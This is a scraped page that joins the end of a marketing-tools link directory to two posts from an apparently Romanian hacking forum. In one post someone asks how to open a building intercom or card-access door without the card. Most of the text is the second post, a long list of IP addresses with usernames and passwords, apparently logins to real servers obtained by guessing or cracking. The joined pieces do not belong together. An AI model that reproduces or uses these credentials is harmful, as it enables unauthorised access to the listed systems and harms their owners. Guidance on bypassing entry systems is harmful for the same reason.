Notification OneSignal Pusher VWO EngagePaid Roost #rank-trackingRank Tracking Nightwatch SERPWoo SEMRush Position TrackingPaid SERP Watcher Rank RangerPaid Serpstat Rank TrackerPaid Topvisor AccuRanker Serplab Serposcope SiteoscopePaid RankTrackrPaid Authority LabsPaid Moz Rank TrackerPaid SERPs Rank TrackingPaid SERP BookPaid Mobile Moxie Search Simulator #redditReddit Subreddit Traffic Analysis Subreddit Target Discovery postpone #retargetingRetargeting Interstate Audiences Perfect AudiencePaid AdRollPaid ReTargeterPaid #review-platformsReview Platforms PodiumPaid feefoPaid TrustpilotPaid YotpoPaid YextPaid REVIEWS.ioPaid SpikeflyPaid BirdeyePaid #screen-recordingScreen Recording Screencast-O-Matic Loom ShareX LICEcap OBS Studio Openvid #seo-agency-toolkitSEO Agency Toolkit SEOMonitorPaid Agency AnalyticsPaid STAT Web CEO Self SEOPaid PositionlyPaid Raven ToolsPaid HubSpotPaid SEO PowerSuitePaid Advanced Web RankingPaid Link Research ToolPaid SearchmetricsPaid BrightedgePaid ConductorPaid SistrixPaid LinkdexPaid #seo-alertsSEO Alerts ContentKingPaid Little WardenPaid SEO RadarPaid #fluctuationsSERP Fluctuations SEMRush SensorPaid Mozcast Ayima Pulse SERPMetrics Flux SERPs Volatility Index Algoroo Winners & Losers Rank Risk Index Google Grump Rating Advanced Web Ranking SERP Watch Knowledge Graph Sensor Local RankFlux #shopifyShopify Shopifyfd JSON-LD-Shopify-Snippets SchemaPlus Multi‑Store Hreflang Tags #slackSlack Slack MailClark talkus.ioPaid slalert! Meekan Scheduling Notify.ly Team Time Zone Botkit Statsbot #smsSMS TwilioPaid PlivoPaid Disposable SMS Quackr Receive SMSs SMS Inspiration SMS Archives Really Good Texts #socialSocial SocialPilotPaid SendiblePaid Buffer Hootsuite Sprout SocialPaid SocialHubPaid KlearPaid OktopostPaid Postcron AdJelly Social Hub Browser Plugins Ritetag #social-proofSocial Proof ProofPaid FomoPaid #sslSSL CloudFlare Let's Encrypt SSL Server Test HSTS preload list #structured-dataStructured Data JSON-LD Schema Markup Generator JSON-LD Google Tag Manager Fix FAQ Rich Snippet Generator Schema Paths Merkle Generator Rich Snippets Testing Tool Schema AppPaid Schema.dev inLinks ClassySchema WordLift Sources in KP Reading Structured Data Structured Data Types Browser Plugins OpenLink Structured Data Sniffer #text-editorText Editor VS Code Sublime Text Diffchecker Sublime Text Plugins Package Control XML Indent BracketHighlighter VS Code Plugins change-case Auto Rename Tag Beautify SVG Viewer #toolsTools Google Tag Manager Algolia SumoMe AirTable Audacity HandBrake RankTank Outdated Content Finder SupermetricsPaid SEO Tools for Excel LastPass Cached Pages Webrecorder Sucuri SiteCheck Pingometer Eager Meta Title Length Checker WikiGrabber NerdyData HTTP Server Response Viewer RevPaid BeutlerinkPaid Data Google Data Gallery Atlas StatistaPaid Data for SEOPaid Google Dataset Search Google Public Data Google Planning Tools Web Technology Usage Worldometers Code .htaccess Redirects RegEx101 Build RegEx RegExr Regxlib Xpath Cheatsheet Rapid API ProgrammableWeb Postman MonkeyTest UserBob Critical Path CSS Generator Productivity Noisli Moodil Spreed Browser Plugins Extensity Table Capture Link Clump Pasty #mentionTrack Mention BrandentionsPaid MentionPaid TalkwalkerPaid Google Alerts AwarioPaid Moz Fresh Web ExplorerPaid ElokenzPaid Brand24Paid InterestInsightsPaid Groouply Change Detection Wachete Distill.io VisualPing Versionista #translationTranslation Localize.js Weglot DeepL #trendsTrends Google Trends Muckrack Trends Google Shopping Insights Exploding Topics Pinterest Trends Glimpse Market Trends #twitterTwitter Notifier by Content Marketer Tweriod NarrowPaid SocialRank Followerwonk Crowdfire Buffer Respond Browser Plugins Klear #user-onboardingUser Onboarding elev.ioPaid tooltip.ioPaid Intro.js NickelledPaid InlineManual Hopscotch Shepherd Bootstrap Tour WalkMe AppcuesPaid Tour My AppPaid Inspiration User Onboard User Flow Patterns Hey User #videoVideo Stock Video AllTheFreeStock Video Editors Spreadsheet to Video Maker #virtual-assistantVirtual Assistant onlinejobs.phPaid UpworkPaid jobrack.euPaid #voiceVoice Voiceflow #wireframingWireframing wireframe.cc MockFlow #webmaster-toolsWebmaster Tools Google Webmaster Tools Bing Webmaster Tools Yandex Webmaster Tools Browser Plugins Search Analytics for Sheets #website-scrapersWebsite Scrapers Website Downloader HTTrack #website-toolsWebsite Tools Changelog Beamer Headway #wordpressWordPress ShortPixel Image Optimizer Google Tag Manager for WordPress Autoptimize RankMath Disable Feeds Async JavaScript Yoast Lazy Load XT Redirection AMP Plugin Organizer Simply Static Link WhisperPaid String locator #youtubeYoutube Tools TubeBuddy vidIQ Tubics Promotion MediaMisterPaid ClaimSocialAuthorityPaid #awesomeAwesome Stuff Google Search Operators SparkToro Trending PetitHacks Marketing Examples Growth.design Hangout Library SERP FEatures Glossary #listOther Lists Code My UI Motivational Quotes Brand StyleGuides Beaqn.in WebDesignRepo Call To Idea Good UI UX Recipe UX Archive wwwhere CollectUI Appealing Little Big Details ReallyGoodUX Laws of UX Configurator Database Google Sheets Templates LogoBook SOURCE: https://saijogeorge.com/best-marketing-tools/
  15. Buna tuturor. Ei bine de cativa ani ma tot dispera pe mine interfonu de la scara. Ba era extrem de vechi, ba ceva mai 'new' si acuma au bagat si rahatul ala cu cardul de proximitate. Se pricepe de aici cineva sa ma indrume cum pot invata mai multe despre cum functioneaza? Atat cele vechi cat si cele noi. Vreau sa fac si un test intr-un final sa vad daca le pot deschide fara sa posed cartela, bineinteles fara stuff gen filme in care dau jos carcasa si incep sa trag si sa dreg pe acolo. E doar de fun. Multumesc anticipat Cele noi: http://www.electra.ro/userfiles/Image/interfoane/interfoane-panouri-exterioare-audio.jpg Cele vechi: http://www.gazeta-cu-anunturi.ro/imagini_anunt/2011/02/17/Imagine_reparatii-interfoane-interfon-in-bucuresti-sistem-interfon-pam-255.jpg
  16. Lista 2 , mai sunt ceva ceva... 193.137.148.2,admin,admin 193.137.148.2,administrator,administrator123 193.137.148.2,alex,alex123 193.137.148.2,anna,anna 193.137.148.2,bob,password 193.137.148.2,ed,ed 193.137.148.2,editor,editor 193.137.148.2,gail,gail 193.137.148.2,jane,jane123 193.137.148.2,jean,123456 193.137.148.2,kathy,1234 193.137.148.2,kia,kia123 193.137.148.2,mail,[null] 193.137.148.2,maria,password 193.137.148.2,michael,123456 193.137.148.2,mike,1234 193.137.148.2,news,news123 193.137.148.2,nicole,nicole123 193.137.148.2,philip,philip 193.137.148.2,root,root 193.137.148.2,sales,sales 193.137.148.2,security,[null] 193.137.148.2,smtp,[null] 193.137.148.2,spam,[null] 193.137.148.2,system,123456 193.137.148.2,temp,123456 193.137.148.2,test,test 193.137.148.2,testuser,123456 193.137.148.2,tom,tom 193.137.148.2,update,123456 193.137.148.2,vicky,password 193.137.148.2,web,123456 193.137.148.2,webadmin,1234 193.137.148.2,webmaster,123456 193.137.148.4,admin,[null] 193.137.148.4,info,[null] 193.137.148.4,juan,[null] 193.137.148.4,kia,[null] 193.137.148.4,laura,[null] 193.137.148.4,mail,[null] 193.137.148.4,marketing,[null] 193.137.148.4,patricia,[null] 193.137.148.4,support,[null] 193.137.148.4,temp,[null] 193.137.148.4,test,[null] 193.137.148.4,testuser,[null] 193.137.148.4,vicky,[null] 193.137.166.33,maria,maria 193.137.202.210,maria,[null] 193.137.229.179,laura,laura 193.137.232.13,test,test 193.138.118.243,admin,admin 193.138.118.243,postmaster,postmaster 193.138.125.57,king,king 193.138.127.50,abuse,abuse 193.138.127.52,abuse,abuse 193.138.162.82,marketing,marketing 193.138.184.14,test,test123 193.138.184.213,administrator,administrator 193.138.184.213,spam,spam 193.138.184.213,temp,temp 193.138.184.240,test,test123 193.138.184.241,test,test123 193.138.184.242,test,test123 193.138.184.3,test,test123 193.138.184.98,test,test 193.138.185.33,spam,spam 193.138.187.90,spam,spam 193.138.195.218,marketing,marketing 193.138.84.248,marketing,marketing 193.138.84.248,nancy,nancy123 193.138.84.254,marketing,marketing 193.138.84.254,nancy,nancy123 193.14.79.2,support,password 193.140.129.131,postmaster,123456 193.140.240.101,abuse,abuse 193.140.54.91,abuse,123456 193.142.209.62,support,support 193.142.209.91,info,123456 193.145.218.4,info,123456 193.151.240.2,info,1234 193.151.244.68,info,info123 193.151.253.25,info,info 193.151.87.135,test,123456 193.151.87.136,test,test 193.158.119.130,info,info 193.158.19.140,support,support 193.158.230.19,support,support 193.158.67.129,support,support 193.158.67.133,support,support 193.158.67.137,support,support 193.158.67.138,support,support 193.158.67.139,support,support 193.158.67.142,support,support 193.158.67.143,support,support 193.158.67.145,support,support 193.158.67.146,support,support 193.158.67.148,support,support 193.158.90.60,info,info 193.159.232.136,support,support123 193.159.233.136,support,support123 193.16.101.76,admin,admin 193.164.193.200,webmaster,webmaster 193.165.147.102,guest,guest 193.165.147.24,admin,admin 193.165.147.76,test,test 193.165.185.162,info,info 193.165.208.158,test,test 193.165.245.38,admin,admin 193.165.65.5,test,test 193.165.72.148,test,test 193.165.73.40,test,test 193.165.73.47,test,test 193.165.74.16,test,test 193.165.74.51,test,test 193.165.74.72,support,[null] 193.165.75.182,test,test 193.165.76.39,admin,admin 193.165.76.40,admin,admin 193.165.76.41,admin,admin 193.17.76.24,admin,123456 193.170.211.49,test,[null] 193.173.12.34,info,info 193.173.189.211,admin,admin 193.173.4.241,info,info 193.175.238.102,test,test 193.178.119.66,test,test 193.179.105.241,info,123456 193.179.133.77,test,test123 193.179.134.34,info,123456 193.179.241.107,admin,[null] 193.179.242.63,test,test 193.185.195.34,info,[null] 193.185.195.36,admin,admin 193.186.1.74,info,info 193.188.101.245,sales,sales 193.188.37.81,admin,admin 193.188.95.157,support,support 193.189.143.205,test,test 193.189.179.130,admin,admin 193.189.180.132,info,info 193.189.180.160,test,test 193.189.180.160,webmaster,webmaster 193.189.77.139,test,test 193.19.240.130,test,123456 193.19.240.234,test,123456 193.19.82.10,test,test 193.19.92.252,test,123456 193.190.182.99,test,test 193.190.213.2,test,test 193.190.213.43,admin,admin 193.190.234.10,guest,guest 193.190.234.14,guest,guest 193.190.239.17,info,info123 193.190.88.151,test,test 193.191.142.48,support,support 193.192.103.18,test,1234 193.192.105.155,admin,admin 193.192.105.163,info,123456 193.192.115.28,info,info 193.192.115.37,info,1234 193.192.115.37,sales,1234 193.192.123.184,info,[null] 193.193.135.137,webmaster,webmaster 193.193.194.132,admin,admin 193.193.225.230,admin,123456 193.193.231.11,admin,123456 193.194.159.107,guest,guest123 193.194.185.10,test,test 193.194.92.130,admin,admin 193.195.190.252,support,support 193.195.48.72,test,[null] 193.197.157.9,support,support 193.198.197.6,admin,password 193.198.61.3,test,test 193.198.61.4,test,test 193.2.132.34,guest,guest 193.200.155.251,info,1234 193.200.155.251,webmaster,[null] 193.200.165.2,info,info 193.200.32.224,test,test 193.200.6.135,test,test 193.200.60.74,test,test 193.200.81.104,info,info 193.200.81.104,sales,sales 193.200.81.104,test,test 193.201.136.93,test,test 193.201.16.67,test,test 193.201.198.10,test,test 193.201.198.18,test,test 193.201.198.2,test,test 193.201.218.162,test,test 193.201.35.8,support,support 193.201.80.125,info,1234 193.202.125.14,test,test 193.202.125.5,test,test 193.204.195.240,test,test 193.205.140.12,info,info 193.207.175.186,info,info 193.213.13.136,test,password 193.213.81.211,test,test 193.219.177.91,info,1234 193.219.250.35,admin,password 193.219.74.146,webmaster,123456 193.219.75.227,test,test 193.219.78.229,test,test 193.219.78.68,admin,[null] 193.219.91.249,test,test 193.220.134.73,admin,admin 193.220.134.73,info,info 193.220.134.73,support,support 193.220.135.3,info,info 193.220.57.22,info,info 193.222.191.250,admin,123456 193.222.191.94,info,123456 193.224.247.19,info,info 193.224.247.197,test,test 193.224.42.3,admin,1234 193.224.43.11,info,info 193.225.118.22,admin,123456 193.226.119.2,test,test 193.226.122.181,test,test 193.226.151.66,sales,sales 193.226.151.66,test,test 193.226.161.162,test,test 193.226.98.137,test,test 193.227.169.122,test,test 193.227.173.202,info,info 193.227.184.95,info,123456 193.227.184.95,sales,123456 193.227.251.22,test,test 193.230.131.201,test,test 193.230.193.34,test,test 193.230.225.19,admin,admin 193.231.242.35,test,1234 193.231.247.139,service,service 193.232.113.26,test,test 193.232.116.1,guest,guest 193.232.116.17,guest,guest 193.232.116.65,guest,guest 193.232.116.97,guest,guest 193.232.212.12,guest,guest 193.232.212.15,guest,guest 193.232.212.18,guest,guest 193.232.212.212,guest,guest 193.232.212.214,guest,guest 193.232.68.37,sales,sales 193.232.68.37,test,test 193.233.71.78,test,test 193.238.108.138,info,info 193.238.109.62,test,test 193.238.137.37,guest,[null] 193.238.208.113,info,1234 193.238.208.113,sales,1234 193.238.208.121,info,1234 193.238.208.34,info,1234 193.238.208.6,info,1234 193.238.208.60,info,1234 193.238.208.64,sales,1234 193.238.208.67,info,1234 193.238.208.76,info,1234 193.238.28.248,admin,1234 193.238.28.248,info,1234 193.238.30.242,info,123456 193.238.30.242,test,123456 193.238.43.202,test,test123 193.238.54.60,admin,admin 193.238.71.154,support,support 193.239.143.138,test,test 193.239.143.62,test,test 193.239.143.66,test,test 193.239.179.181,admin,admin 193.239.210.229,test,test 193.239.244.194,admin,123456 193.242.107.242,info,info123 193.242.107.252,info,info 193.243.139.8,test,123456 193.247.245.110,test,test123 193.251.220.5,info,info 193.251.59.108,webmaster,webmaster 193.252.104.27,admin,admin 193.252.107.5,info,info 193.252.110.33,webmaster,webmaster 193.252.173.48,test,test 193.252.187.139,guest,1234 193.252.189.87,test,test 193.252.202.79,guest,guest 193.252.208.67,test,[null] 193.252.208.7,info,info 193.252.30.225,sales,123456 193.252.39.33,info,[null] 193.253.176.141,sales,sales 193.253.183.69,info,info 193.253.187.243,admin,[null] 193.253.225.49,info,info 193.253.246.176,admin,admin 193.253.255.89,test,123456 193.253.59.194,info,info 193.254.196.59,info,info 193.254.196.59,test,test 193.254.218.1,sales,sales 193.254.218.1,service,service 193.26.10.95,test,test 193.26.27.10,test,test 193.26.27.125,test,test 193.26.27.209,test,test 193.26.27.42,test,test 193.26.27.75,test,test 193.26.27.90,test,test 193.26.27.93,test,test 193.27.205.74,test,test 193.27.219.51,info,[null] 193.27.219.51,webmaster,[null] 193.27.243.20,guest,[null] 193.28.86.126,guest,[null] 193.28.95.22,info,[null] 193.28.95.22,webmaster,[null] 193.29.255.62,test,test123 193.31.15.37,test,test 193.31.15.83,webmaster,webmaster 193.33.102.4,test,123456 193.33.134.113,info,1234 193.33.134.12,info,1234 193.33.134.25,info,1234 193.33.134.4,info,1234 193.33.134.4,test,test123 193.33.250.2,test,test 193.33.250.4,test,test 193.33.251.1,test,test 193.33.251.2,test,test 193.33.251.3,test,test 193.33.251.4,test,test 193.33.251.9,test,test 193.33.46.127,test,123456 193.33.90.2,test,test 193.34.136.36,test,1234 193.34.136.56,test,1234 193.34.35.250,test,test 193.34.78.146,admin,123456 193.34.90.244,info,info 193.36.177.210,test,test 193.4.194.54,test,1234 193.41.101.7,info,[null] 193.41.119.179,info,info 193.41.22.133,admin,[null] 193.41.22.133,info,[null] 193.41.22.133,sales,sales 193.41.22.133,service,password 193.41.22.133,support,password 193.41.22.133,test,test 193.41.60.105,admin,123456 193.41.60.105,test,123456 193.41.98.142,test,password 193.41.98.174,test,password 193.41.98.193,test,password 193.41.98.194,test,password 193.41.98.203,test,password 193.41.98.204,test,test123 193.41.98.208,test,password 193.41.98.209,test,password 193.41.98.214,test,password 193.41.98.219,test,password 193.41.98.225,test,password 193.41.98.228,test,password 193.43.127.18,test,test 193.43.127.21,test,test 193.43.149.36,info,info 193.43.149.37,info,info 193.43.149.38,info,info 193.43.149.39,info,info 193.45.10.19,test,test 193.46.236.234,test,test 193.46.238.67,test,test 193.46.83.5,test,test123 193.47.144.1,guest,guest 193.47.151.12,webmaster,webmaster 193.47.74.2,test,test 193.47.74.3,test,test 193.47.78.105,info,info 193.49.101.16,webmaster,webmaster 193.49.101.17,webmaster,webmaster 193.56.193.30,sales,sales 193.68.122.50,info,info 193.68.122.51,info,info 193.68.122.52,info,info 193.68.122.53,info,info 193.68.3.244,info,1234 193.68.3.245,info,1234 193.68.32.10,info,info 193.68.51.252,admin,admin 193.68.51.253,admin,admin 193.68.82.66,test,test 193.71.28.134,test,test 193.72.18.149,test,1234 193.74.217.53,test,test 193.77.124.167,info,info 193.77.126.190,info,[null] 193.77.138.33,test,test123 193.77.152.224,test,test 193.77.152.225,test,test 193.77.155.53,info,info 193.77.157.14,info,info 193.77.158.216,info,1234 193.77.158.222,support,support 193.77.159.208,info,info 193.77.166.58,support,123456 193.77.166.68,info,123456 193.77.166.68,support,123456 193.77.238.204,info,info123 193.77.238.204,test,test 193.77.58.203,test,test 193.77.68.30,test,test 193.77.68.40,test,test 193.77.90.119,info,info 193.80.249.115,admin,admin 193.80.249.115,info,info 193.80.249.115,service,service 193.84.112.124,webmaster,webmaster 193.85.112.41,info,info 193.85.172.170,info,info 193.85.250.3,test,test 193.86.110.145,test,test 193.86.200.30,test,test 193.9.30.1,test,test 193.9.30.11,test,test 193.9.30.2,test,test 193.9.31.1,test,test 193.92.11.4,info,info 193.92.146.90,sales,sales 193.92.252.226,test,1234 193.92.32.2,info,1234 193.92.45.100,webmaster,[null] 193.92.78.234,info,1234 193.92.89.3,admin,[null] 193.92.9.192,test,test 193.93.12.230,test,test 193.93.228.2,test,test 193.95.206.130,info,info123 193.95.220.230,test,test 193.95.233.20,info,info 193.95.243.51,test,test123 193.95.255.66,info,info 194.0.88.26,admin,[null] 194.1.145.252,support,support 194.1.195.4,test,test123 194.100.41.234,info,info 194.100.7.77,info,info123 194.102.105.33,test,test 194.102.105.33,web,web 194.102.108.230,laura,laura 194.102.108.238,postmaster,postmaster 194.102.108.53,carol,123456 194.102.108.53,contact,123456 194.102.108.53,info,123456 194.102.108.53,internet,123456 194.102.108.53,king,123456 194.102.108.53,philip,123456 194.102.108.53,server,123456 194.102.108.53,username,123456 194.102.148.190,info,[null] 194.102.148.65,info,[null] 194.102.148.66,info,[null] 194.102.155.212,sales,sales 194.102.155.212,support,support 194.102.233.162,office,office 194.102.58.66,test,test 194.103.55.3,backup,backup 194.105.106.29,test,test 194.105.133.2,bob,bob 194.105.169.131,brian,brian 194.105.169.131,info,info 194.105.170.122,sales,sales 194.105.185.185,backup,password 194.105.188.17,backup,[null] 194.105.21.119,service,1234 194.105.64.4,david,password 194.105.68.4,richard,password 194.106.102.74,test,test 194.106.141.213,info,[null] 194.106.141.213,sales,[null] 194.106.158.73,david,david 194.106.162.26,backup,backup 194.106.175.150,update,123456 194.106.183.130,office,office 194.106.183.130,test,test 194.106.192.3,spam,spam 194.106.210.5,admin,admin123 194.106.210.5,test,test 194.106.34.202,mike,mike 194.106.43.174,office,password 194.106.48.53,test,test 194.106.63.98,mike,mike 194.108.133.129,info,info 194.108.137.150,spam,password 194.108.151.114,info,[null] 194.108.151.114,office,[null] 194.109.137.197,info,info 194.109.137.197,patrick,patrick 194.109.149.149,abuse,password 194.109.149.149,patrick,patrick 194.109.149.155,abuse,password 194.109.149.155,patrick,patrick 194.109.153.218,news,news123 194.109.192.186,amanda,amanda 194.109.217.184,test,test123 194.109.217.98,test,test 194.109.88.58,test,test 194.109.91.2,backup,backup 194.109.91.2,info,info 194.110.186.154,webmaster,webmaster 194.110.192.189,jean,jean 194.110.213.93,info,123456 194.110.221.172,postmaster,[null] 194.112.132.61,service,service 194.116.144.28,test,test 194.116.148.1,test,test 194.117.170.243,info,password 194.117.75.2,test,test123 194.119.246.16,test,test 194.12.254.133,support,support 194.121.13.73,info,info 194.121.27.68,info,info 194.121.77.134,info,[null] 194.122.115.130,admin,admin 194.122.28.154,info,info 194.125.115.19,info,[null] 194.125.14.177,linda,password 194.125.241.222,sales,sales 194.125.9.34,info,password 194.125.9.34,sales,password 194.126.0.2,info,[null] 194.126.1.203,test,test 194.126.2.51,test,password 194.126.22.218,info,info 194.126.8.45,info,password 194.130.28.3,support,support 194.131.241.132,test,123456 194.131.241.149,support,support 194.131.241.52,admin,admin 194.132.13.1,info,[null] 194.134.35.147,sales,sales123 194.134.35.232,mark,password 194.134.7.32,sales,sales123 194.137.150.5,webmaster,webmaster 194.140.22.72,info,info 194.140.245.34,test,12345 194.140.245.36,test,12345 194.140.59.24,info,info 194.141.4.2,support,support 194.143.132.10,info,[null] 194.143.132.10,webmaster,[null] 194.143.132.94,info,info 194.143.144.98,test,test123 194.143.154.187,support,support 194.143.196.1,info,[null] 194.143.234.164,admin,password 194.146.109.164,linda,linda 194.146.142.34,test,test 194.146.203.137,abuse,admin 194.146.203.137,admin,admin 194.149.118.59,info,info 194.149.118.6,webmaster,webmaster 194.149.155.2,test,test123 194.149.235.24,sales,sales 194.149.76.114,info,password 194.149.76.114,sales,password 194.149.76.25,support,password 194.150.185.197,test,test123 194.150.232.10,admin,[null] 194.150.232.10,guest,[null] 194.150.232.10,info,[null] 194.150.232.10,sales,[null] 194.150.232.10,service,[null] 194.150.232.10,support,[null] 194.150.232.10,test,[null] 194.150.232.10,webmaster,[null] 194.151.149.179,test,test 194.151.235.105,test,test 194.151.37.60,admin,admin 194.151.87.69,info,info 194.153.128.118,test,test 194.153.128.121,test,test 194.153.128.253,test,test 194.153.128.99,test,test 194.153.131.136,info,info 194.153.188.162,test,123456 194.153.188.163,test,123456 194.153.188.185,test,123456 194.153.242.1,service,service 194.153.242.2,service,service 194.154.76.134,support,support 194.154.76.134,test,test 194.158.33.82,info,info 194.158.39.77,info,info 194.158.43.194,sales,sales 194.158.43.196,sales,sales 194.164.232.66,info,password 194.164.239.74,mark,mark 194.164.245.130,sales,password 194.164.246.18,sales,password 194.165.129.12,info,info 194.165.141.14,test,test123 194.165.141.67,info,info 194.165.141.67,sales,sales 194.165.145.102,admin,admin123 194.165.145.102,info,1234 194.165.145.222,admin,admin123 194.165.145.222,info,123456 194.165.146.170,support,support 194.165.146.246,info,123456 194.165.151.230,info,password 194.165.151.3,test,123456 194.165.151.84,admin,admin123 194.165.151.89,admin,password 194.165.158.128,info,123456 194.165.158.149,test,123456 194.165.158.176,info,info123 194.165.158.41,info,123456 194.165.158.56,sales,1234 194.165.158.66,info,info 194.165.158.66,test,test 194.165.158.88,info,info123 194.165.159.130,info,123456 194.165.159.243,support,123456 194.165.159.243,test,test 194.165.159.243,webmaster,123456 194.165.159.244,support,123456 194.165.159.244,test,test 194.165.159.244,webmaster,123456 194.165.16.178,test,test 194.165.62.49,test,test 194.165.62.65,test,test 194.17.7.30,service,password 194.170.13.40,test,test 194.170.200.14,admin,admin 194.170.200.14,info,info 194.170.200.14,sales,sales 194.170.200.14,webmaster,webmaster 194.170.200.16,info,123456 194.170.200.18,sales,123456 194.170.200.19,info,12345 194.170.200.31,admin,admin123 194.170.200.35,info,info123 194.170.200.36,test,123456 194.170.241.247,sales,password 194.170.242.146,sales,password 194.176.176.102,test,test123 194.176.191.2,service,service 194.176.59.2,info,123456 194.177.213.33,test,test 194.179.60.165,info,info 194.181.93.147,tom,1234 194.183.128.165,test,test 194.183.15.254,info,123456 194.183.162.133,test,test 194.183.226.43,info,info 194.183.231.13,info,[null] 194.183.231.8,info,[null] 194.183.71.67,admin,admin 194.183.73.150,info,password 194.183.85.234,angela,angela 194.183.85.234,michelle,michelle 194.183.86.242,info,info 194.184.169.19,info,password 194.186.0.74,test,test 194.186.101.203,admin,admin 194.186.110.102,admin,admin 194.186.110.102,info,info 194.186.121.102,guest,[null] 194.186.20.155,guest,guest 194.186.242.198,support,support 194.186.242.198,test,test 194.186.248.182,info,[null] 194.186.47.75,internet,12345 194.186.7.106,admin,admin 194.186.81.194,admin,123456 194.186.85.34,test,test 194.187.180.42,tom,qwerty 194.204.18.2,andrew,andrew123 194.204.27.218,mark,mark 194.209.30.43,patrick,patrick 194.212.118.34,info,12345 194.213.40.122,test,test 194.216.113.94,guest,guest 194.216.113.94,john,john 194.230.57.46,admin,1234 194.231.193.185,webmaster,webmaster 194.242.122.94,admin,1234 194.242.123.226,test,12345 194.245.103.15,test,test 194.250.223.130,abuse,abuse 194.44.211.81,service,service 194.44.220.192,test,test 194.44.237.183,support,support 194.44.242.243,test,test 194.44.29.198,info,info123 194.44.31.225,admin,admin 194.44.31.225,guest,guest 194.44.77.100,admin,admin 194.44.80.198,test,test123 194.44.82.62,test,test 194.45.202.54,test,test 194.46.34.106,sales,password 194.46.34.34,info,info 194.46.34.34,sales,sales 194.46.39.210,info,[null] 194.46.39.237,test,password 194.46.48.138,info,info 194.46.48.194,sales,sales 194.46.49.78,test,password 194.46.61.234,info,info 194.46.61.234,test,test 194.46.8.11,info,123456 194.47.65.13,guest,guest 194.47.65.14,guest,guest 194.50.125.10,test,test 194.50.184.22,test,test 194.51.120.213,guest,[null] 194.51.134.10,test,test 194.51.221.108,test,test123 194.51.52.143,test,1234 194.51.52.143,webmaster,1234 194.51.92.162,info,info 194.54.11.134,admin,password 194.54.11.134,webmaster,webmaster 194.54.21.10,test,test 194.54.83.190,admin,admin 194.54.9.92,test,[null] 194.6.104.210,sales,sales 194.6.227.20,info,info 194.6.227.20,support,support 194.65.18.18,webmaster,webmaster 194.67.95.23,info,info 194.68.222.167,info,[null] 194.69.195.5,test,test 194.71.116.247,support,support 194.71.116.247,test,test 194.72.12.50,test,test 194.73.116.132,test,test 194.73.185.25,info,123456 194.73.185.25,support,support 194.73.83.214,sales,sales 194.73.83.214,support,support 194.74.170.222,info,password 194.74.170.222,sales,password 194.74.170.222,service,password 194.74.170.222,support,password 194.74.19.73,sales,password 194.74.82.17,test,test 194.77.193.102,test,test 194.77.62.50,test,test 194.78.119.37,info,info123 194.78.14.114,info,info 194.78.14.114,sales,[null] 194.78.180.179,admin,password 194.78.183.48,sales,[null] 194.78.185.19,info,[null] 194.78.192.188,info,info 194.78.194.156,info,1234 194.78.198.174,webmaster,1234 194.78.198.30,info,info 194.78.199.111,test,test 194.78.201.124,support,support 194.78.201.7,info,info 194.78.203.168,test,test 194.78.204.177,info,[null] 194.78.205.97,info,[null] 194.78.206.195,info,info 194.78.206.218,info,info 194.78.206.30,test,test123 194.78.207.252,info,info 194.78.212.32,info,password 194.78.216.112,service,[null] 194.78.216.212,info,info 194.78.217.15,test,test 194.78.217.252,info,info 194.78.218.47,info,info 194.78.221.183,test,test 194.78.236.90,sales,sales 194.78.239.173,test,test 194.78.251.247,info,info123 194.78.251.247,test,test 194.78.38.155,info,info 194.78.39.215,test,test 194.78.41.210,test,test 194.78.47.2,test,test 194.78.47.68,test,test 194.78.5.197,sales,sales 194.78.50.18,test,test 194.78.58.2,test,test 194.78.64.211,test,123456 194.78.71.154,test,test 194.78.8.101,info,info 194.78.92.113,info,info 194.78.92.113,test,test 194.79.158.10,info,info 194.79.34.19,admin,123456 194.79.66.50,test,123456 194.8.152.66,admin,[null] 194.8.174.150,admin,123456 194.8.174.150,info,123456 194.83.245.157,test,test 194.83.57.19,test,test 194.83.57.20,test,test 194.83.57.32,guest,guest 194.83.57.32,test,test 194.83.57.34,test,password 194.84.103.2,admin,123456 194.84.120.160,info,password 194.84.120.160,support,password 194.84.4.3,test,test 194.84.76.160,info,123456 194.85.131.38,info,info 194.85.135.174,info,info 194.85.149.184,test,test 194.88.197.112,test,test 194.88.197.17,test,test 194.88.197.37,test,test 194.88.238.130,angela,angela 194.88.239.64,test,1234 194.88.246.53,test,123456 194.89.13.19,admin,admin 194.9.124.211,test,test 194.90.125.91,info,12345 194.90.130.9,info,info12 194.90.144.179,sales,qwerty 194.90.144.179,web,12345 194.90.168.201,info,info123 194.90.168.201,test,test 194.90.176.130,admin,12345 194.90.201.131,abuse,abuse123 194.90.201.131,support,support 194.90.201.141,abuse,abuse123 194.90.201.141,support,support 194.90.216.186,info,[null] 194.94.208.103,123,123 194.94.208.103,1234,1234 194.94.208.103,1236,1236 194.94.208.103,abc123,abc123 194.94.208.103,abuse,abuse 194.94.208.103,account,account 194.94.208.103,admin,admin 194.94.208.103,admin,admin123 194.94.208.103,administrator,administrator 194.94.208.103,administrator,administrator12 194.94.208.103,allison,allison 194.94.208.103,amanda,amanda 194.94.208.103,andrew,andrew 194.94.208.103,angela,angela 194.94.208.103,canon,canon 194.94.208.103,carol,carol 194.94.208.103,chris,chris 194.94.208.103,chuck,chuck 194.94.208.103,cindy,cindy 194.94.208.103,computer,computer 194.94.208.103,david,david 194.94.208.103,dragon,dragon 194.94.208.103,general,general 194.94.208.103,guest,guest 194.94.208.103,harley,harley 194.94.208.103,helen,helen 194.94.208.103,info,info 194.94.208.103,intern,intern 194.94.208.103,internet,internet 194.94.208.103,james,james 194.94.208.103,jennifer,jennifer 194.94.208.103,jerry,jerry 194.94.208.103,jim,jim 194.94.208.103,john,john 194.94.208.103,kelsey,kelsey 194.94.208.103,linda,linda 194.94.208.103,lindsay,lindsay 194.94.208.103,maggie,maggie 194.94.208.103,magic,magic 194.94.208.103,mark,mark 194.94.208.103,michael,michael 194.94.208.103,michelle,michelle 194.94.208.103,mickey,mickey 194.94.208.103,mike,mike 194.94.208.103,nicole,nicole 194.94.208.103,passwd,passwd 194.94.208.103,password,password 194.94.208.103,patrick,patrick 194.94.208.103,qwerty,qwerty 194.94.208.103,richard,richard 194.94.208.103,root,root 194.94.208.103,sales,sales 194.94.208.103,sarah,sarah 194.94.208.103,science,science 194.94.208.103,shanti,shanti 194.94.208.103,spencer,spencer 194.94.208.103,steve,steve 194.94.208.103,temp,temp 194.94.208.103,test,test 194.94.208.103,tom,tom 194.94.208.103,training,training 194.94.208.103,web,web 194.94.208.103,webadmin,webadmin 194.94.208.103,webmaster,webmaster 194.94.208.103,webuser,webuser 194.94.208.103,www,www 194.94.208.109,admin,[null] 194.94.208.109,guest,[null] 194.94.208.109,info,info 194.94.208.109,sales,sales 